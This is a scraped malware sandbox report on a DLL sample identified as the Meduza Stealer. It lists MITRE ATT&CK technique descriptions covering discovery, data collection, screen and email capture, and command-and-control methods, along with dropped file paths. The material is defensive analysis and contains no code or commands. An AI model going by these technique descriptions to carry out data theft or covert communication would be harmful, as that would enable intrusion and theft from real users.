Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iviewers.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Meduza Stealer

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\loaddll32.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvr32.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dcl5ob1.3pm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13imzm4c.wsv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dmx4rgm.hpd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ipdeqoc.lwl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vl4ovfe.2gf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3duiz03j.et1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52bohxd3.1ro.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yh1mgj2.vnu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5a1h3pj.r13.ps1

Windows Analysis Report
iviewers.dll

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre